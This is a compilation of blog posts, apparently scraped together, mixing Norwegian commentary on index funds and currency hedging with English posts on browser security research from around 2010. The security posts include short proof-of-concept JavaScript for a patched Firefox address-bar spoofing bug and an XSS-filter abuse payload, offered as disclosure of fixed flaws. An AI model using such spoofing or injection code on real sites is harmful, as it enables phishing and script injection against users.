Den virkelige verden

Dette er et innlegg publisert i Kapital nr. 11 2010 som svar på et innlegg i nr. 9 av Petter Berge i North Capital 


I en gjestekommentar i Kapital nr. 9 i år skriver Petter Berge i North Capital at passiv forvaltning ikke er et reelt alternativ fordi det ikke er mulig å oppnå indeksens avkastning. Berge mener i den forbindelse at eksempler jeg har gjengitt på min blogg på passive fond som slår indeksen og indeksfond uten kostnad er lite representative eller direkte feilaktige. En bør derfor velge aktive forvaltere, slik som North Capital antar jeg. Nå er Berges påstander stort sett feil, noe som på en utmerket måte illustrerer fordelene med passiv indeksforvaltning.

Det jeg er enig med Berge i er at aktive investorer er helt nødvendig for å korrigere priser slik at markedet kan fungere. Det er likevel så mange av dem at omtrent all empirisk forskning viser at de taper i forhold til indeksfond. Dette skyldes én ting – høye kostnader. Før kostnader slår faktisk den gjennomsnittlige aktive forvalter markedet så vidt.

Det er derfor ingen grunn for hverken oljefondet eller andre å bekymre seg for at det blir for få aktive forvaltere. Det er bra å ta etisk ansvar for kinesiske tekstilarbeidere, men finanshusene på Wall Street får greie seg selv som best de kan.

Berge argumenterer så videre for at indeksforvaltning i realiteten er dyrt og vanskelig. Han viser til at Vanguards hovedfond, som jeg har brukt som eksempel, kun gjenspeiler en meget likvid del av det amerikanske markedet. Fondet måles imidlertid mot en indeks som representerer 99,5% av amerikanske børsnoterte selskaper. Berge mener at en ikke effektivt kan indeksforvalte små selskaper, men Vanguard har slike fond og slår indeksen også her. Berge mener Deutsche Banks (DB) kostnadsfrie fond i realiteten koster 2,5% fordi DB tar utbyttet selv, men det har DB bekreftet overfor meg at er feil. Bergs forvirring her skyldes at investor kan velge om utbyttet skal utbetales eller legges til fondet. Berge bagatelliserer dette som to enkeltstående eksempler, men for oljefondet er jo investering i Vanguards fond et reelt alternativ. Oljefondet ville bare utgjøre om lag 25% av Vanguards totale portefølje.

Intrusion detection: doing it wrong

Quite a few thick volumes have been written on the topic of securing corporate environments - but most of them boil down to the following advice:


  1. Reduce your attack surface by eliminating non-essential services and sensibly restricting access to data,
  2. Compartmentalize important services to lower the impact of a compromise,
  3. Keep track of all assets and remediate known vulnerabilities in a timely manner,
  4. Teach people to write secure code and behave responsibly,
  5. Audit these processes regularly to make sure they actually work.


We have an array of practical methodologies and robust tools to achieve these goals - but we also have a pretty good understanding of where this model falls apart. As epitomized by Charlie Miller's goofy catchphrase, "I was not in your threat model", the reason for this is two-fold:



  • You will likely get owned, by kids: reasonably clued people with some time on their hands are (and for the foreseeable future will be) able to put together a fuzzer and find horrible security flaws in most of the common server or desktop software in a matter of days. Modern, large-scale enterprises with vast IT infrastructure, complex usability needs, and a diverse internal user base, are always extremely vulnerable to this class of attackers.


    As a feel-good measure, this discussion is often framed in terms of high-profile vulnerability trade, international crime syndicates, or government-sponsored cyberwarfare - but chances are, the harbinger of doom will be a bored teenager, or a geek with an outlandish agenda; they are less predictable than foreign governments, too - so in some ways, we should be fearing them more.

  • Compartmentalization will not save you: determined attackers will take their time, and will get creative if needs be. Compartmentalization may buy a couple of days, but simply can't be designed to keep them away forever, yet keep the business thriving: as witnessed by a number of well-publicized security incidents, design compromises and poor user judgment inevitably create escalation paths.



Past a certain point, proactive measures begin to offer diminishing returns: throwing money at the problem will probably never get you to a point where a compromise is unlikely, and the business can go on. This is not a cheering prospect - but something we have to live with.


The key to surviving a compromise may lie in the capability to detect a successful attack very early on. The attackers you should be fearing the most are just humans, and have to learn about the intricacies of your networks, and the value of every asset, as they go. These precious hours may give you the opportunity to recover - right before an incident becomes a disaster.


This brings us to the topic of intrusion detection - a surprisingly hard and hairy challenge in the world of information security. Most of the detection techniques at our disposal today are
inherently bypassable; this is particularly true for bulk of the tricks employed by most of the commercial AV, IDS, IPS, and WAF systems I know of. And that's where the problem lies: because the internals of these tools are essentially public knowledge, off-the-shelf intrusion detection systems often amount to a fairly expensive (and often by itself vulnerable!) tool to deter only the dumbest of attackers. A competent adversary, prepared in advance or simply catching the scent of a specific IDS toolkit, is reasonably likely to work around it without breaking a sweat.


The interesting - and highly contentious - question is what happens when the design of your in-house intrusion detection system becomes a secret. Many of my peers would argue this is actually harmful: in most contexts, security-by-obscurity does nothing to correct the underlying problems, and merely sweeps them under the rug. Yet, I am inclined to argue that in this particular case, it offers a qualitative difference. Here's why:


Let's begin by proposing a single, trivial anomaly detection rule, custom-tailored for our operating environment (and therefore, reasonably sensitive and unlikely to generate false positives); for example, it could be a simple daemon to take notice of execve() calls with stdin pointing directly to a network socket - a common sign of server-targeted shellcode. When the architecture is not shared with common commercial tools, external attackers stand a certain chance of tripping this check, and a certain chance of evading it - but this is governed almost solely by having dumb luck, and not by their skill. The odds are not particularly reassuring, but are a starting point.


(Now, an insider stands a better chance of defeating the mechanism - an unavoidable if less common problem - but a rogue IT employee is an issue that, for all intents and purposes, defies all attempts to solve it with technology alone.)


Let's continue further down this road: perhaps also introduce a
simple tool to identify unexpected interactive sessions within encrypted and non-encrypted network traffic; or even a tweaked version of /bin/sh that alerts us to unusual -c or stdin payloads. Building on top of this, we can proceed to business logic: say, checks for database queries for unusual patterns, or coming from workstations belonging to users not usually engaged in customer support. Each of these checks is trivial, and stands only an average chance of detecting a clued attacker. Yet, as the chain of tools grows longer, and the number of variables that needs to be guessed perfectly right increases, the likelihood of evading detection - especially early in the process - becomes extremely low. Simplifying a bit, the odds of strolling past ten completely independent, 50% reliable checks, are just 1 in 1024; it does not matter whether the attacker is the best hacker in the world or not (unless also a clairvoyant).


For better or worse, intrusion detection seems to be an essential survival skill - and I think we are all too often doing it wrong. A successful approach on the uniqueness and diversity - and not necessarily the complexity - of the tools used; the moment you neatly package them and share the product with the world, your IDS becomes a $250,000 novelty toy.


Sadly, large organizations often lack the expertise, or just the courage, to get creative. There is a stigma of low expectations attached to intrusion detection in general, to security-by-obscurity as a defense strategy, and to maintaining in-house code that can't generate pie charts on a quarterly basis.


But when you are a high-profile target, defending only against the dumb attackers in a world full of brilliant ones - some of them driven by peculiar and unpredictable incentives - strikes me as a poor approach in the long run.

Yeah, about that address bar thing...

As promised, here's another interesting browser bug, showing the perils of being user-friendly.


You are probably familiar with the usual behavior of the address bar: when you click on a link, the browser keeps showing the old location up until the new content is retrieved and actually replaces the previous page. Only Safari behaves differently, always showing the new destination - which I think can be deceptive:


<input type=submit value="Click me!" onclick="clicked()">
<script>
function clicked() {
w = window.open("", "_blank");
w.document.body.innerHTML = "Where do I come from?";
w.location = 'http://1.2.3.4/';
}
</script>

I don't like this behavior, but it perhaps does not constitute an outright security flaw: the spinning throbber is a weak, but visible indicator of foul play.


But to the point! If you look carefully at the remaining browsers, you may also notice a curious exception to the rule: when a link is opened in a new window or a tab, most browsers will put the destination URL in the address bar right away. Why? Apparently, usability is the reason: doing this seemed more user-friendly than showing about:blank for a couple of seconds.


Alas, this design decision creates an interesting vulnerability in Firefox: the about:blank document actually displayed in that window while the page is loading is considered to be same origin with the opener; the attacker can inject any content there - and still keep his made up URL in the address bar.


Well, the spinning throbber is there, right? As it turns out, you can make it go away. The harder way is to use an URL that legitimately returns HTTP 204; the easier way is to simply call window.stop():



<input type=submit value="Click me!" onclick="clicked()">
<script>
var w;
function clicked() {
w = window.open("http://1.2.3.4/", "_blank", "toolbar=1,menubar=1");
setTimeout('w.document.body.innerHTML = "Fake content!";w.stop();', 500);
}
</script>


Reported early April, CVE-2010-1206; Mozilla addressed the glitch in release 3.6.7.

HTTPS is not a very good privacy tool

Today, EFF announced HTTPS Everywhere - a browser plugin that automatically "upgrades" all requests to a set of predefined websites, such as Wikipedia, to HTTPS. This is done in a manner similar to Strict Transport Security.


Widespread adoption of encryption should be praised - but the privacy benefits of tools like this are often misunderstood. The protocol is engineered to maintain the confidentiality and integrity of a priori private data exchanged over the wire - and does very little to keep your actions private when accessing public content.


Even with HTTPS, every passive, unsophisticated attacker should be able to exactly tell which Wikipedia page you happen to be interested in: looking at packet sizes, direction, and timing patterns for encrypted HTTP requests, he can identify the resource with a high degree of confidence. With that particular site, you do not even need to crawl the content on your own: database dumps are provided by the foundation, and take a couple of hours to download over DSL.


Adding some random padding and jitter to the communications will help, but can be only taken so far without introducing a very significant performance penalty. Because of this, large-scale behavioral analysis is still likely to be very effective even if we do some of that.


Naturally, there are situations where HTTPS actually helps with privacy; but fewer than we probably come to expect. Even the contents of encrypted text typed in by the user can be reconstructed in some fascinating cases, as explored in this research paper from Microsoft.

Browser-side XSS detectors of doom

The prevalence of cross-site scripting - an unfortunate consequence of how the web currently operates - is one of the great unsolved challenges in the world of information security. Short of redesigning HTML from scratch, browser developers are not particularly well-positioned to fix this issue; but understandably, they are eager to at least mitigate the risk.


One of the most publicized efforts along these lines is the concept of browser-side, reflected XSS detectors: the two most notable implementations are David Ross' XSS filter (shipping in Internet Explorer 8) and Adam Barth's XSS Auditor (WebKit browsers - currently in Safari 5). The idea behind these tools is very simple: if query parameters seen in the request look suspiciously close to any "active" portions of the rendered page, the browser should assume foul play - and step in to protect the user.


Naturally, nothing is that simple in the browser world. The major design obstacle is that the check has to be passive - active probes are likely to cause persistent side effects on the server. Because of this, the detector can merely look for correlation, but not confirm causation; try this or this search in Internet Explorer 8 to see a canonical example of why this distinction matters.


Since passive checks inevitably cause false positives, the authors of these implementations defaulted to a non-disruptive "soft fail" mode: when a suspicious pattern is detected, the browser will still attempt to render the page - just with the naughty bits selectively removed or defanged in some way.


While a fair amount of issues with XSS detectors were pointed in the past - from hairy implementation flaws to trivial bypass scenarios - the "soft fail" design creates some more deeply rooted problems that may affect the safety of the web in the long run. Perhaps the most striking example is this snippet, taken from a real-world website:


<script>
...
// Safari puts <style> tags into new <head> elements, so
// let's account for this here.
...
</script>
...
[ sanitized attacker-controlled data goes here ]


The data displayed there is properly escaped; under normal circumstances, this page is perfectly safe. But now, consider what happens if the attacker-controlled string is } body { color: expression(alert(1)) } - and ?q=<script> is appended by at the end of the URL. The filter employed in MSIE8 will neutralize the initial <script>, resulting in the subsequent <style> tag being interpreted literally - putting the browser in a special parsing mode. This, in turn, causes the somewhat perverted CSS parser to skip any leading and trailing text, and interpret the attacker-controlled string as a JavaScript expression buried in a stylesheet.


Eep. This particular case should be fixed by the June security update, but the principle seems dicey.


The risk of snafus like this aside, the fundamental problem with XSS detectors is that quite simply, client-side JavaScript is increasingly depended upon to implement security-critical features. The merits of doing so may be contested by purists, but it's where the web is headed. No real alternatives exist, too: a growing number of applications uses servers merely as a dumb, ACL-enforcing storage backend, with everything else implemented on client side; mechanisms such as localStorage and widget manifests actually remove the server component altogether.


To this client-heavy architecture, XSS detectors pose an inherent threat: they make it possible for third-party attackers to selectively tamper with the execution of the client-side code, and cause the application to end up in an unexpected, inconsistent state. Disabling clickjacking defenses is the most prosaic example; but more profound attacks against critical initialization or control routines are certainly possible, and I believe they will happen in the future.


The skeptic in me is not entirely convinced that XSS filters will ever be robust and reliable enough to offset the risks they create - but I might be wrong; time will tell. Until this is settled, I and several other people pleaded for an opt-in strict filtering mode that prevents the page from being rendered at all when a suspicious pattern is detected. Now that it is available, enabling it on your site is probably a good idea.

The curse of inverse strokejacking

This is the third interesting bug I had in my pipeline for a while. It's far less scary than the previous ones, but nevertheless, probably amusing enough.


A while ago, I posted a whimsical proof of concept for what I greatly enjoy calling strokejacking. The problem amounts to this: a rogue site can put an unrelated, third-party web application in a hidden frame - and then, by offering some seemingly legitimate functionality, entice the user to type in a body of text. As the user is typing, the attacker is free to examine key codes from within the onkeydown handler - and when desired, momentarily move focus to said hidden frame, causing the actual onkeypress event to be routed there instead. The trick essentially permits arbitrary, attacker-controlled input to be synthesized on the targeted site - possibly changing victim's privacy settings, setting up mail forwarding, or authorizing new users to access personal data.


The attack is arguably more interesting than your traditional, run-of-the-mill clickjacking, mostly because it allows for more complex interactions. Still, in most cases, it can be prevented the same way - with X-Frame-Options or with framebusting JavaScript - so no reason to panic, right?


Well, there's a twist: shortly after reporting this problem publicly several months ago, I realized that the attack scenario could be reversed. Consider a third-party gadget or an advertisement framed on a legitimate page, a pretty common pattern today. The frame is free to grab focus from the top-level document, as this operation is not governed by the same-origin policy. Normally, this causes the caret to disappear from where the user is expecting it to be - but by briefly giving up focus at strategically timed intervals, the appearance of a blinking cursor in the top-level document can be maintained. The rogue gadget can then read all the typed characters via onkeydown - and have onkeypress delivered to the top-level document, so that everything seems to be working as expected - with an extra copy of all the data silently delivered to the attacker.


A simple WebKit-specific proof of concept can be found here. The usual clickjacking defenses are not applicable in this scenario, for obvious reasons.


WebKit bug: 26824. Firefox bug: 552255. CVE-2010-1422.

Announcing ref_fuzz, a 2 year old fuzzer

Somewhere in 2008, I created a relatively simple DOM binding fuzzer dubbed ref_fuzz. The tool attempted to crawl the DOM object hierarchy from a particular starting point, collect object references discovered during the crawl by recursively calling methods and examining properties, and then reuse them in various ways after destroying the original object. In essence, the goal was to find use-after-free conditions across the browser codebase.


The fuzzer managed to crash all the mainstream browsers on the market at that time, in a number of seemingly exploitable ways. Early fixes from Opera and Apple started shipping somewhere in 2008; some more arrived in 2009. Today, Microsoft released a fix and a bulletin for CVE-2010-1259 (MS10-035), while Apple released fixes for CVE-2010-1119 - fixing the last of the scary memory corruption cases attributed to the tool.


The story of ref_fuzz is interesting, because to some extent, it illustrates the shortcomings of one-way responsible disclosure. Were I to release this fuzzer publicly in 2008, it would probably cause some short-term distress - but in the end, vendor response would likely be swift, out of simple necessity; this certainly proved to be the case with mangleme, a comparably effective fuzzer I developed 2004.


In this particular case, however, the appropriate parties were notified privately, with no specific disclosure deadline given. This, coupled with the inability to create simple repro cases (inherently due to the design of the fuzzer), likely prompted the developers to deprioritize investigating and responding to these flaws - in the end, taking months or years instead of days or weeks. Given that they need to respond to hundreds or thousands of seemingly more urgent bugs every year, this is not unexpected.


What's more troubling is that, within that timeframe, many of the crashes triggered by ref_fuzz were independently rediscovered and fixed: several exploitable crashes were patched without attribution by Microsoft in December 2009 (MSRC cases 9480jr and 9501jr); similarly, several WebKit flaws were rediscovered by Alexey Proskuryakov and addressed in WebKit earlier this year (say, bug 33729), and by Pwn2Own winners shortly thereafter. Is it unreasonable to assume that malicious researchers were just as likely to spot these glitches on their own?


In any case - I am happy to finally release the tool today. You can check out the fuzzer here (warning: clicking on this link may cause your browser to misbehave).

Safari: a tale of betrayal and revenge

Looks like I am finally free to discuss the first interesting browser bug on my list - so here we go. I really like this one: its history goes back to 1994, and spans several very different codebases. The following account is speculative, but probably a pretty good approximation of what went wrong.


Let's begin with this simple URL:


http:example.com/


This syntax demonstrates an unintentional and completely impractical quirk in the URL parsing algorithm specified some 16 years ago in RFC 1630. Verbatim implementations are bound to parse this string as a relative reference to protocol = 'http', host = $base_url.host, path = 'example.com/'. It does not make a whole lot of sense, and indeed, in RFC 3986, Tim Berners-Lee had this to say:


"This is considered to be a loophole in prior specifications of partial URI [RFC1630]. Its use should be avoided but is allowed for backward compatibility."


Fast forward two years: the KDE team is working on a new open-source browser, Konqueror. Their browser uses KURL as the canonical URL parsing library across the codebase. This parser behaves in an RFC-compliant way when handling our weird input string, with one seemingly unimportant difference: if the current parsing context does not have a valid host name associated with it, the address is not rejected as unresolvable; the host name is simply set to an empty string. No big deal, right?


Well, somewhere around 2002, the renderer and the JavaScript engine used in Konqueror - KHTML and KJS - are forked off under the name of WebKit, and become the foundation for Safari. The fork contains almost all the necessary core components for a browser, with a notable exception of a built-in HTTP stack - and so, Apple decides to reuse their existing CFNetwork library for this purpose. When our special URL finally makes it to this library, it is interpreted in a far more intuitive, but technically less correct way - as protocol = 'http', host = 'example.com', path = '/'; HTTP cookies and other request parameters are then supplied accordingly.


The result? When you open two windows in Safari - one pointing to http:hairy-spiders.com, and the other pointing to http:fuzzy-bunnies.com - the HTTP stack will make sure they are populated with cookie-authenticated data coming from the two different servers named in the URLs; but the same origin checks within the browser will rely on KURL instead. Remember how KURL spews out an empty host name in both cases? Because empty strings always match, both pages are deemed to be coming from the same source, and can access each other at will. Oops.


Well, there's still a catch: this attack will only work as expected if the windows are opened by hand; in documents opened from a web page, the host name from the base URL will interfere with how the URLs are broken down. Thankfully, we can work around it, simply by hopping through a data: URL.


Reported to the vendor in January 2010, fixed in Safari 4.1 and 5.0 (APPLE-SA-2010-06-07-1, CVE-2010-0544). A simple and harmless proof-of-concept can be found here.

Sikring og gambling

Det går et hårfint skille mellom å sikre seg og å spekulere. Å gjøre det enkelt og å holde hodet kaldt gjør hele forskjellen.

En avtale om fastrente er et eksempel på det vi kaller sikring. Fast rente gir mer forutsigbare fremtidige renteutgifter. Det mange ikke vet er at man kan gå ut av en slik avtale før den utløper. Dersom renten har steget, slik den har gjort i det siste, kan det bety en pen sum kontanter inn på kontoen. Slik gevinstsikring er imidlertid å anse som et aktivt veddemål i markedet, eller spekulasjon som det også kalles.

Ta for eksempel Norwegian. I følge Bjørn Kjos sikret flyselskapet seg mot økning i oljeprisen i 2007, men ikke i 2008 fordi en ikke trodde på videre oppgang. Det som i utgangspunktet var en sikringsstrategi endret da karakter til å bli ren spekulasjon i oljeprisen. Resultatet var at Norwegian fikk store problemer som følge av en ekstrem høy oljepris i noen måneder, inntil finanskrisen og oljepriskollaps reddet veddemålet. Det gikk derfor ikke så ille til slutt, men å avbyte en eksisterende sikringsstrategi var i realiteten et veddemål mot markedet på at oljeprisen skulle ned.

Bedrifter bør ideelt sett sikre den fremtidige prisen de vil oppnå i markedet idet beslutning om produksjon tas. En eksportør vil foreksempel være svært utsatt for svingninger i valutakursen. Beslutningen om hvor mye som skal produseres tas gjerne lang tid før en vet noe om prisen på euro. En enkel løsning er å inngå en kontrakt om veksling til en bestemt kurs i fremtiden. På denne måten forsvinner all valutarisiko ved levering og bedriften kan konsentrere seg om det den kan.

Merkelig nok er ikke dette standard prosedyre hos alle norske eksportbedrifter. I stedet tilbyr banker av og til opsjoner som sikring mot valutasvingninger. Disse opsjonene innebærer at bedriften sikrer seg mot nedsiden, men får en ubegrenset oppside. Dette hører jo tilforlatelig ut. Når euroen faller gir opsjonen en kompensasjon for bedriftens tap. Når den stiger får bedriften bedre kurs og ren fortjeneste. Det som ikke er så opplagt for det fleste er at slike opsjoner i realiteten er et spekulasjonsinstrument og ikke et sikringsinstrument.

For å forklare det kan vi tenke oss en salgsavdeling som avtaler en pris på euro i fremtiden, og på denne måten eliminerer all valutarisiko. Sikrere enn dette kan det ikke bli. Samtidig, og uten å vite om salgsavdelingens geniale sikringsstrategi, går direktøren ut og kjøper en opsjon som gir ubetaling når euroen stiger. Siden opsjonskjøpet ikke er relatert til sikringen er det vanskelig å karakterisere direktørens disposisjon som annet enn ren spekulasjon. Opsjonen har naturligvis en stor oppside, men den har også en kostnad. Dersom veddemålet til direktøren ikke slår til vil han tape hele investeringen. Netto er imidlertid resultatet for bedriften identisk med en opsjon som sikrer nedsiden.

Dette illustrerer hvorfor slike opsjoner er uegnet som sikringsverktøy. En bedrift som velger en nedsidesikring spekulerer i realiteten på at kursen på euro vil gå i deres favør. Bedriftens motspillere er store multinasjonale finansinstitusjoner med enorme ressurser til å analysere feilprising i valutamarkedet. Mon tro hvem som vinner i det lange løp?

Mange vil kanskje synes at denne opsjonssikringen hørtes litt komplisert ut. Det syntes ikke DnB Nor, som i følge DN i februar i år solgte noen enda mer kompliserte sikringsprodukter til tørrfiskeksportører i Lofoten. Produktet som ble solgt var en nedsideopsjon, men den interessante vrien var at dersom euroen beveget seg i eksportørenes retning, så ville de tjene dobbelt så mye som kurssvingningen tilsa. I eksemplet vårt tilsvarer det at direktøren dobler innsatsen!

Opsjoner kommer imidlertid ikke gratis. De må betales på en eller annen måte. For tørrfiskeksportørene betød det at hele kurssikringen forsvant dersom euroen steg over et visst nivå. Eksportørene kjøpte i realiteten en brannforsikring som ikke gjaldt om huset brant ned.

Den enkleste måten å unngå å gjøre denne type feil er å ha et klart skille mellom sikring og spekulasjon. Selve sikringen bør gjøres i form av en avtale om fast pris eller et instrument som gir tilsvarende kontantstrøm. Om man så ønsker å spekulere i markedet med opsjoner, eller vedde på nedgang i oljeprisen, så gjør man det på et eget budsjett. Da vil man lettere se at slike disposisjoner i realiteten øker risikoen i stedet for å minske den.